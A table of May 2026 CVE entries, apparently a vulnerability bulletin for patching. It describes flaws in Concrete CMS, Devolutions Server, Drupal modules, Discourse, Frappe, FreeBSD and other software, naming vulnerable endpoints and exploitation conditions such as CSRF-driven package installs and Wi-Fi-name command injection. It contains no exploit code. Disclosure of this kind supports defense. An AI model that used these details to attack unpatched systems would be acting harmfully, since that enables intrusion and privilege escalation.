| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to CSRF via Backend\File::approveVersion. Victim with edit_file_contents permission is CSRF'd into publishing an attacker-chosen previously-uploaded version (downgrade to an older version of a file, or activation of a co-editor's unpublished version). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-22 | not yet calculated | CVE-2026-8340 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR + wrong-authorization-level in the Express association Reorder dialog. This can cause Cross-entity state tampering with view-only permission on one entry. To be affected, a website has to be using express and relying on express entity ordering. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-22 | not yet calculated | CVE-2026-8347 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to missing authorization in the bulk_user_assignment.php which can lead to privilege escalation to Administrative Group. Any authenticated user with access to the bulk user assignment dashboard page can add any user email to any group and can remove legitimate admins. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Vincent55 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8350 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS version 9.0 to 9.5.0 is vulnerable to Stored XSS via page name in the Atomik theme. A rogue editor can inject arbitrary JavaScript that executes in the context of any authenticated user visiting the affected account pages. This can lead to session hijacking, credential theft, malicious actions performed on behalf of users, and potential privilege escalation. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.1 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-22 | not yet calculated | CVE-2026-8353 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/logs/delete. The The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8409 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/logs/bulk/delete. The The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8410 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/delete. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8411 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/cache. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8412 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/page/bulk/design. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8413 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/event/duplicate. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8414 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/dialog/express/association/reorder. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8415 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file addFavoriteFolder($id). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8416 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/update/do_update/<pkgHandle>. The do_update() method in concrete/controllers/single_page/dashboard/extend/update.php checks only canInstallPackages() before executing upgradeCoreData() and upgrade() on the named package's controller. Because the endpoint is a state-changing GET route with no token enforcement, an attacker can force an authenticated administrator to trigger a package upgrade via a single cross-site navigation.In order to be vulnerable, the victim must be passing canInstallPackages() and and a target package must already be already installed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8417 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below contains a CSRF vulnerability in the install_package() method of concrete/controllers/single_page/dashboard/extend/install.php. An attacker who can cause an authenticated administrator to visit a crafted page, and who has placed or caused a package to be present under DIR_PACKAGES/<handle>/, can force the installation of that package without any CSRF protection. Package installation executes the package controller's install() method as the web server user, enabling remote code execution. In order to be vulnerable, the victim must be passing canInstallPackages. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8421 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/update/prepare_remote_upgrade/<remoteMPID>. An attacker who controls the remote package returned for a known marketplace item ID can overwrite the package PHP on disk and force its upgrade() method to execute in a single browser navigation. This results in remote code execution as the web server user. In order to be vulnerable, the victim must be passing canInstallPackages, victim site must be connected to the Concrete marketplace; and the attacker controls the package returned for a marketplace item ID already installed on the victim site. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8426 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file removeFavoriteFolder($id). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8427 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below emits a CSRF token in the local_available_update.php view ($token->output('do_update')) but the corresponding do_update() method in concrete/controllers/single_page/dashboard/system/update/update.php never calls $this->token->validate('do_update'). The form is rendered as a POST form, meaning the token reaches the browser, but because the controller discards it without verification, an attacker can craft a cross-site POST that triggers a core CMS update to an attacker-specified version string. In order to be vulnerable, theictim must be passing canUpgrade()anda valid update version must be present under DIR_CORE_UPDATES. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8428 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file star(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8432 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file rescan(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8433 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file rescanMultiple(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8434 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery (CSRF) at concrete/controllers/backend/file approveVersion(). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8435 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Creartia Internet Consulting--ICMS Content Management | Authorization Bypass vulnerability in Creartia's ICMS software could allow an attacker to gain unauthorized access to protected features by manipulating the HTTP redirect headers of the login process, causing the script to continue running and enabling privilege escalation without the need for credentials. | 2026-05-18 | not yet calculated | CVE-2026-4320 | https://www.incibe.es/en/incibe-cert/notices/aviso/authorization-bypass-icms-content-management-creartia-internet-consulting |
| cyntler--react-doc-viewer v1.17.1 | Cross-Site Scripting (XSS) vulnerability in @cyntler/react-doc-viewer v1.17.1 allows remote attackers to execute arbitrary JavaScript via a crafted .txt file. The TXTRenderer component fails to sanitize file content and explicitly casts raw data as a ReactNode | 2026-05-20 | not yet calculated | CVE-2026-30691 | https://github.com/cyntler/react-doc-viewer/issues/317 https://github.com/walidriouah/CVE-2026-30691 |
| Dell--Portrait Dell Color Management Application | An issue was discovered in the Portrait Dell Color Management application before 3.7.0 for Dell monitors. On Windows, a symbolic link vulnerability allows a local low-privileged user to escalate privileges to Administrator. During installation, the software writes the file CCFLFamily_07Feb11.edr to C:\ProgramData\Portrait Displays\CW\data\i1D3\ while running with elevated privileges. Because the installer does not properly validate symbolic links or reparse points at the destination path, an attacker can create a malicious link that redirects the write operation to an arbitrary system location, enabling arbitrary file creation or overwrite with elevated privileges. | 2026-05-19 | not yet calculated | CVE-2026-34883 | https://www.portrait.com/dell-security-cve-updates/ https://www.portrait.com/dell |
| Devolutions--Server | Improper access control in the entry activity log feature in Devolutions Server allows an authenticated user with access to an entry but without the required permission to retrieve that entry's activity logs via a crafted API request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-5171 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Improper authorization in the Active Directory browsing feature in Devolutions Server allows a low-privileged authenticated user to obtain authentication material associated with a stored PAM provider service account via authentication relay to an attacker-controlled server. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-7325 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Improper enforcement of the sealed-entry workflow in the entry sensitive-data retrieval feature in Devolutions Server allows an authenticated user with access to a sealed entry to retrieve its sensitive data without triggering the unseal audit notification via a crafted API request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-8477 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Improper handling of factor key state in the multi-factor authentication management feature in Devolutions Server allows an attacker with knowledge of a user's password to bypass the user's multi-factor authentication after the user reconfigures their factors. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 | 2026-05-22 | not yet calculated | CVE-2026-9047 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Missing authorization in the vault import feature in Devolutions Server 2026.1.16.0 and earlier allows a low-privileged authenticated user to create new vaults via a crafted import request. | 2026-05-22 | not yet calculated | CVE-2026-9223 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Missing authorization in the user profile update feature in Devolutions Server allows an authenticated Active Directory user to modify their own profile attributes via a crafted API request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9224 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Improper input validation in the external authentication provider flow in Devolutions Server allows an unauthenticated remote attacker to redirect victims to an attacker-controlled domain via a crafted login link. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9245 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Improper access control in the entry documentation and attachment features in Devolutions Server allows an authenticated user with vault read access to retrieve the documentation and attachments of sealed entries via a crafted API request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9246 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Insufficient logging in the entry export feature in Devolutions Server allows an authenticated user with export permissions to export a sealed entry without triggering the unseal notification to administrators via a crafted export request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9247 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Authorization bypass in the entry duplication feature in Devolutions Server allows an authenticated user with write access to any vault to copy documentation and attachments from an entry in a vault they cannot access via a crafted save request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9248 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Unverified password change in Devolutions Server allows an attacker to change a user's password without providing the previous one via a crafted password change request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9249 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| Devolutions--Server | Missing authorization in the entry status management feature in Devolutions Server allows a non-administrator authenticated user to bypass the administrator-enforced Pending Approval flow and gain access to an entry's data via a crafted status change request. This issue affects : * Devolutions Server 2026.1.6.0 through 2026.1.16.0 * Devolutions Server 2025.3.20.0 and earlier | 2026-05-22 | not yet calculated | CVE-2026-9251 | https://devolutions.net/security/advisories/DEVO-2026-0013/ |
| discourse--discourse | Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, an authenticated user on a Discourse instance with the form templates feature enabled can read the name and structured content of form templates that are intended exclusively for categories they are not authorized to access. Impact is limited to disclosure of site configuration metadata. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. | 2026-05-19 | not yet calculated | CVE-2026-33514 | https://github.com/discourse/discourse/security/advisories/GHSA-w6g7-p2p9-2m5h https://github.com/discourse/discourse/commit/ae5c9570fb918442c4d96abc83c1e7e169909b02 |
| discourse--discourse | Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, a vulnerability in the discourse-subscriptions plugin allows users to gain access to subscription-gated groups without completing payment. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. | 2026-05-19 | not yet calculated | CVE-2026-34154 | https://github.com/discourse/discourse/security/advisories/GHSA-pjgj-7mjq-6j7g |
| Drupal--Colorbox Inline | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Colorbox Inline allows Cross-Site Scripting (XSS). This issue affects Colorbox Inline: from 0.0.0 before 2.1.1. | 2026-05-19 | not yet calculated | CVE-2026-8493 | https://www.drupal.org/sa-contrib-2026-036 |
| Drupal--Date iCal | Missing Authorization vulnerability in Drupal Date iCal allows Forceful Browsing. This issue affects Date iCal: from 0.0.0 before 4.0.15. | 2026-05-19 | not yet calculated | CVE-2026-8495 | https://www.drupal.org/sa-contrib-2026-037 |
| Drupal--Drupal core | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Drupal core allows Cross-Site Scripting (XSS). This issue affects Drupal core: from 8.0.0 before 10.5.9, from 10.6.0 before 10.6.7, from 11.0.0 before 11.2.11, from 11.3.0 before 11.3.7. | 2026-05-19 | not yet calculated | CVE-2026-6365 | https://www.drupal.org/sa-core-2026-001 |
| Drupal--Drupal core | Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Drupal Drupal core allows Object Injection. This issue affects Drupal core: from 8.0.0 before 10.5.9, from 10.6.0 before 10.6.7, from 11.0.0 before 11.2.11, from 11.3.0 before 11.3.7. | 2026-05-19 | not yet calculated | CVE-2026-6366 | https://www.drupal.org/sa-core-2026-002 |
| Drupal--Drupal core | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Drupal core allows Cross-Site Scripting (XSS). This issue affects Drupal core: from 11.3.0 before 11.3.7. | 2026-05-19 | not yet calculated | CVE-2026-6367 | https://www.drupal.org/sa-core-2026-003 |
| Drupal--Node View Permissions | Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal Node View Permissions allows Forceful Browsing. This issue affects Node View Permissions: from 0.0.0 before 1.7.0, from 2.0.0 before 2.0.1. | 2026-05-19 | not yet calculated | CVE-2026-8491 | https://www.drupal.org/sa-contrib-2026-034 |
| Drupal--Obfuscate | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Obfuscate allows Cross-Site Scripting (XSS). This issue affects Obfuscate: from 0.0.0 before 2.0.2. | 2026-05-19 | not yet calculated | CVE-2026-6871 | https://www.drupal.org/sa-contrib-2026-033 |
| Drupal--Orejime | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Orejime allows Cross-Site Scripting (XSS). This issue affects Orejime: from 0.0.0 before 2.0.16. | 2026-05-19 | not yet calculated | CVE-2026-6095 | https://www.drupal.org/sa-contrib-2026-032 |
| Drupal--Simple Hierarchical Select (shs) | Simple Hierarchical Select (SHS) for Drupal 7 contains cross-site scripting risk due to improper output escaping of term-derived text. Confirmed affected paths include field formatter output (shs_field_formatter_view) and term-tree child-term data generation (shs_term_get_children). Malicious taxonomy term names can be rendered unsafely depending on output context. This affects versions from 7.x-1.0 through (and including) 7.x-1.10. | 2026-05-21 | not yet calculated | CVE-2026-4929 | NES patch branch comparison https://d7es.tag1.com/security-advisories/simple-hierarchical-select-moderately-critical-cross-site-scripting |
| Drupal--Term Reference Tree | In the Drupal 7 Term Reference Tree module, two stored XSS vectors exist in the widget/formatter rendering pipeline. Vector A (token display templates): When the Token module is enabled and token display templates are configured, attacker-controlled token output (e.g., term description) is rendered without proper sanitization. Any user who can edit the referenced taxonomy terms can inject HTML/JS that executes when the field is rendered. Vector B (term label rendering): Taxonomy term labels are not properly sanitized before being rendered in the widget, allowing a user with permission to create or edit taxonomy terms to inject scripts into the term name that execute when a form containing the widget is viewed. Exploit affects versions 7.x-1.x up to and including 7.x-1.11. | 2026-05-21 | not yet calculated | CVE-2026-4093 | https://www.herodevs.com/vulnerability-directory/cve-2026-4093 https://d7es.tag1.com/security-advisories/taxonomy-term-reference-tree-widget-moderately-critical-cross-site-scripting |
| Drupal--Translate Drupal with GTranslate | Modification of Assumed-Immutable Data (MAID) vulnerability in Drupal Translate Drupal with GTranslate allows Resource Location Spoofing. This issue affects Translate Drupal with GTranslate: from 0.0.0 before 3.0.5. | 2026-05-19 | not yet calculated | CVE-2026-8492 | https://www.drupal.org/sa-contrib-2026-035 |
| Easy Chat--Easy Chat Server 3.1 | Directory Traversal vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the UserName parameter | 2026-05-22 | not yet calculated | CVE-2026-36227 | http://easy.com https://github.com/NullByte8080/CVE-2026-36227 |
| Easy Chat--Easy Chat Server 3.1 | Buffer Overflow vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the chat message functionality | 2026-05-22 | not yet calculated | CVE-2026-36228 | http://easy.com https://github.com/NullByte8080/CVE-2026-36228 |
| Espon--Epson L14150 FL27PB | Buffer Overflow vulnerability in EPSON L14150 FL27PB allows a remote attacker to execute arbitrary code via the RAW Printing Service (JetDirect) on TCP port 9100 | 2026-05-20 | not yet calculated | CVE-2026-39047 | https://github.com/AzhariRamadhan/CVE-PORT-9100 https://gist.github.com/AzhariRamadhan/1defc815542fb72e6025da2ce53a1046 |
| Follett--Software's Destiny Library Manager | Directory traversal in Follett Software's Destiny Library Manager 22_0_2_rc1 and fixed in v.22.5 AU1 allows remote attackers to read arbitrary system and application files via the image parameter | 2026-05-22 | not yet calculated | CVE-2025-45145 | http://follett.com https://medium.com/@jaredutahusa/cve-2025-45145-unauthenticated-local-file-inclusion-in-fsc-destiny-40a3f11b3a4d |
| frappe--frappe | Frappe is a full-stack web application framework. Versions prior to 15.105.0 and 16.15.0 contain a possible Arbitrary File Read vulnerability via Path Traversal. The issue is resolved in versions 16.15.0, 15.105.0 and above. | 2026-05-20 | not yet calculated | CVE-2026-39352 | https://github.com/frappe/frappe/security/advisories/GHSA-67rf-pxgh-vfqv https://github.com/frappe/frappe/releases/tag/v16.15.0 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. In versions 2.50.0 and below, a user with course editing role could upload a SCORM ZIP package to write files outside the intended directory. This issue has been resolved in version 2.50.1. | 2026-05-20 | not yet calculated | CVE-2026-39405 | https://github.com/frappe/lms/security/advisories/GHSA-mxh7-g3r7-g96h https://github.com/frappe/lms/releases/tag/v2.50.1 |
| FreeBSD--FreeBSD | libcasper(3) communicates with helper processes via UNIX domain sockets, and uses the select(2) system call to wait for data to become available. However, it does not verify that its socket descriptor fits within select(2)'s descriptor set size limit of FD_SETSIZE (1024). An attacker able to cause an application using libcasper(3) to allocate large file descriptors, e.g., by opening many descriptors and executing a program which is not careful to close them upon startup, may trigger stack corruption. If the target application runs with setuid root privileges, this could be used to escalate local privileges. | 2026-05-21 | not yet calculated | CVE-2026-39461 | https://security.freebsd.org/advisories/FreeBSD-SA-26:22.libcasper.asc |
| FreeBSD--FreeBSD | The setcred(2) system call is only available to privileged users. However, before the privilege level of the caller is checked, the user-supplied list of supplementary groups is copied into a fixed-size kernel stack buffer without first validating its length. If the supplied list exceeds the capacity of that buffer, a stack buffer overflow occurs. Because the bounds check on the supplementary groups list occurs after the kernel stack buffer has already been written, an unprivileged local user may trigger the overflow without holding any special privilege. Successful exploitation may allow an attacker to execute arbitrary code in the context of the kernel, allowing an unprivileged local user to gain elevated privileges on the affected system. | 2026-05-21 | not yet calculated | CVE-2026-45250 | https://security.freebsd.org/advisories/FreeBSD-SA-26:18.setcred.asc |
| FreeBSD--FreeBSD | A file descriptor can be closed while a thread is blocked in a poll(2) or select(2) call waiting for that descriptor. Because the blocked thread does not hold a reference to the underlying object, this closure may result in the object being freed while the thread remains blocked. In this situation, the kernel must remove the blocked thread from the per-object wait queue prior to freeing the object. In the case of some file descriptor types, the kernel failed to unlink blocked threads from the object before freeing it. When the blocked thread is subsequently woken, it accesses memory that has already been freed resulting in a use-after-free vulnerability. The use-after-free vulnerability may be triggered by an unprivileged local user and can be exploited to obtain superuser privileges. | 2026-05-21 | not yet calculated | CVE-2026-45251 | https://security.freebsd.org/advisories/FreeBSD-SA-26:19.file.asc |
| FreeBSD--FreeBSD | When a fusefs file system implements extended attributes, the kernel may send a FUSE_LISTXATTR message to the userspace daemon to retrieve the list of extended attributes for a given file. The FUSE protocol requires the daemon to return a packed list of NUL-terminated strings. The fusefs kernel module calls strlen() on this daemon-supplied buffer without first verifying that the entire list is NUL-terminated. If a malicious daemon sends a non-NUL-terminated list, the fusefs kernel module may read beyond the end of one heap-allocated buffer and potentially write beyond the end of a second buffer. A malicious daemon could disclose up to 253 bytes of kernel heap memory, or it could inject up to 250 attacker-controlled bytes into unallocated kernel heap space. | 2026-05-21 | not yet calculated | CVE-2026-45252 | https://security.freebsd.org/advisories/FreeBSD-SA-26:20.fusefs.asc |
| FreeBSD--FreeBSD | ptrace(PT_SC_REMOTE) failed to properly validate parameters for the syscall(2) and __syscall(2) meta-system calls. As a result, a user with the ability to debug a process may trigger arbitrary code execution in the kernel, even if the target process has no special privileges. The missing validation allows an unprivileged local user to escalate privileges, potentially gaining full control of the affected system. | 2026-05-21 | not yet calculated | CVE-2026-45253 | https://security.freebsd.org/advisories/FreeBSD-SA-26:21.ptrace.asc |
| FreeBSD--FreeBSD | In the case of the cap_net service, when a key present in the old limit was omitted from the new limit, the missing key was treated as "allow any" instead of being rejected. In certain scenarios, an application that had previously restricted a subset of network operations could ask for a new limit that extended the permissions of the process. | 2026-05-21 | not yet calculated | CVE-2026-45254 | https://security.freebsd.org/advisories/FreeBSD-SA-26:24.cap_net.asc |
| FreeBSD--FreeBSD | When bsdinstall or bsdconfig are prompted to scan for nearby Wi-Fi networks, they build up a list of network names and use bsddialog(1) to prompt the user to select a network. This is implemented using a shell script, and the code which handled network names was not careful to prevent expansion by the shell. As a result, a suitably crafted network name can be used to execute commands via a subshell. The problem can be exploited to execute code as root on the system running bsdinstall or bsdconfig. The attacker would need to create an access point with a specially crafted name and be within range of a Wi-Fi scan. Note that bsdinstall and bsdconfig are vulnerable as soon as the user prompts them to scan for nearby networks; they do not need to actually select the malicious network. | 2026-05-21 | not yet calculated | CVE-2026-45255 | https://security.freebsd.org/advisories/FreeBSD-SA-26:23.bsdinstall.asc |
